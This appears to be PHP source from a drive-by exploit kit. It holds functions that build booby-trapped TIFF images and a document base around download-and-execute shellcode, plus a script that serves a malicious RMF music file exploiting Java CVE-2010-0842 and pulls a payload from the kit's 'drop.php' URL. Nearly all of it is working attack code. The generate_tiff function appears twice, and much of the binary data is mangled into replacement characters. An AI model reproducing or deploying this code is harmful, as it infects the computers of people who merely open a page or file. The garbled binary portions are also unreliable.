function make_docbase($url) { $shellcode = shellcode_dl_exec($url); $docbase = 'CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC'; $docbase = $docbase . 'ÁL4|ì&y8vqc8òþe'; $docbase = $docbase . '?Ï4 7|^Ð4|ê05|'; $docbase = $docbase . '¬4|ø.7|'; $docbase = $docbase . '7Y4|p±8|O/7|'; $docbase = $docbase . '\'44|�Q_Ã+ç4|\\?~G'; $docbase = $docbase . '*9õ5ìõZkô6È5|'; $docbase = $docbase . 'k4|O/7|ÁL4|`±8|'; $docbase = $docbase . '_ª5|i5|p?Ò?64|'; $docbase = $docbase . 'QÎt>V,ÁL4|p±8|'; $docbase = $docbase . 'ê05|^Ð4|¬4|:63'; $docbase = $docbase . 'AAAAAAAAAAAAAAAA'; $docbase = $docbase . 'AAAAAAAAAAAAAAAA'; $docbase = $docbase . $shellcode; return $docbase; }
function generate_tiff($url) { $shellcode_offset = 400; $tiff_offset = 8248; $shellcode = shellcode_dl_exec($url); $tiff = 'MM'; $tiff = $tiff . ''; $tiff = $tiff . pack('N', $tiff_offset); $tiff = $tiff . str_repeat('', $shellcode_offset); $tiff = $tiff . $shellcode; $tiff = $tiff . str_repeat('', $tiff_offset - 8 - strlen($shellcode) - $shellcode_offset); $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ')'; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . '$'; $tiff = $tiff . '��J<��J���Jd�J'; $tiff = $tiff . '��J'; $tiff = $tiff . ''; $tiff = $tiff . 'd�J�-�J�*�J'; $tiff = $tiff . '���J��J8��J���J'; $tiff = $tiff . 'd�J����'; $tiff = $tiff . ''; $tiff = $tiff . 'd�J�-�J�*�J'; $tiff = $tiff . '���J��J0��J���J'; $tiff = $tiff . 'd�J����"'; $tiff = $tiff . ''; $tiff = $tiff . '�c�J'; $tiff = $tiff . ''; $tiff = $tiff . '�!�J'; $tiff = $tiff . '$��J'; $tiff = $tiff . 'ZRj'; $tiff = $tiff . '��J'; $tiff = $tiff . '���J'; $tiff = $tiff . '$��J'; $tiff = $tiff . 'X�.<'; $tiff = $tiff . '��J'; $tiff = $tiff . '���J'; $tiff = $tiff . '$��J'; $tiff = $tiff . 'Zt�'; $tiff = $tiff . '��J'; $tiff = $tiff . '���J'; $tiff = $tiff . '$��J'; $tiff = $tiff . '�MM'; $tiff = $tiff . '��J'; $tiff = $tiff . '���J'; $tiff = $tiff . '$��J'; $tiff = $tiff . '*���'; $tiff = $tiff . '��J'; $tiff = $tiff . '���J'; $tiff = $tiff . '$��J'; $tiff = $tiff . 'u��'; $tiff = $tiff . '��J'; $tiff = $tiff . '���J'; $tiff = $tiff . '$��J'; $tiff = $tiff . '� _�'; $tiff = $tiff . '��J'; $tiff = $tiff . '���J'; $tiff = $tiff . '$��J'; $tiff = $tiff . '�'; $tiff = $tiff . '��J'; $tiff = $tiff . '���J'; $tiff = $tiff . '$��J'; $tiff = $tiff . '�� '; $tiff = $tiff . '��J'; $tiff = $tiff . '���J'; $tiff = $tiff . '$��J'; $tiff = $tiff . '����'; $tiff = $tiff . '��J'; $tiff = $tiff . '���J'; $tiff = $tiff . '$��J'; $tiff = $tiff . '����'; $tiff = $tiff . '��J'; $tiff = $tiff . '���J'; $tiff = $tiff . '$��J'; $tiff = $tiff . '����'; $tiff = $tiff . '��J'; $tiff = $tiff . '��J'; $tiff = $tiff . ''; $tiff = $tiff . 'ا�J'; $tiff = $tiff . '��J'; return $tiff; }
function generate_tiff($url) { $shellcode_offset = 400; $tiff_offset = 8248; $shellcode = shellcode_dl_exec($url); $tiff = 'MM'; $tiff = $tiff . ''; $tiff = $tiff . pack('N', $tiff_offset); $tiff = $tiff . str_repeat('', $shellcode_offset); $tiff = $tiff . $shellcode; $tiff = $tiff . str_repeat('', $tiff_offset - 8 - strlen($shellcode) - $shellcode_offset); $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ')'; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . ''; $tiff = $tiff . '$'; $tiff = $tiff . '��J< �J�W�J��J'; $tiff = $tiff . 'C�J'; $tiff = $tiff . ''; $tiff = $tiff . '��J���J�J'; $tiff = $tiff . '}Y�J��J8 �J�W�J'; $tiff = $tiff . '��J����'; $tiff = $tiff . ''; $tiff = $tiff . '��J���J�J'; $tiff = $tiff . '}Y�J��J0 �J�W�J'; $tiff = $tiff . '��J����"'; $tiff = $tiff . ''; $tiff = $tiff . 'c�J�JZRj��J'; $tiff = $tiff . '��J�JX�.<��J'; $tiff = $tiff . '��J�JZt���J'; $tiff = $tiff . '��J�J�MM'; $tiff = $tiff . '��J�J*�����J'; $tiff = $tiff . '��J�Ju����J'; $tiff = $tiff . '��J�J� _���J'; $tiff = $tiff . '��J�J�'; $tiff = $tiff . '��J�J�� ��J'; $tiff = $tiff . '��J�J������J'; $tiff = $tiff . '��J�J������J'; $tiff = $tiff . '��J�J������J'; $tiff = $tiff . '��JxP�JI��J�J'; return $tiff; }
function shellcode_dl_exec_js($url) { $shellcode = uescape(shellcode_dl_exec($url)); return $shellcode; }
<?php include '../config.php'; include '../include/shellcode.php'; $shellcode = shellcode_dl_exec($config_url . '/drop.php?e=Java-2010-0842'); $rmf = 'IREZ' . 'SONGmSΛm' . '' . '' . '' . 'ITL�±µ ~ϋp�†ώ°5' . '“β^ήχ' . '�' . '' . '8�ΙPQRSVW' . $shellcode; header('Expires: Mon, 26 Jul 1997 05:00:00 GMT'); header('Cache-Control: no-cache'); header('Pragma: no-cache'); header('Accept-Ranges: bytes '); header('Content-Length: ' . strlen($rmf) . ' '); header('Content-Disposition: inline; filename=midi20100842.rmf'); header(' '); header('Content-Type: application/x-msdownload '); echo $rmf;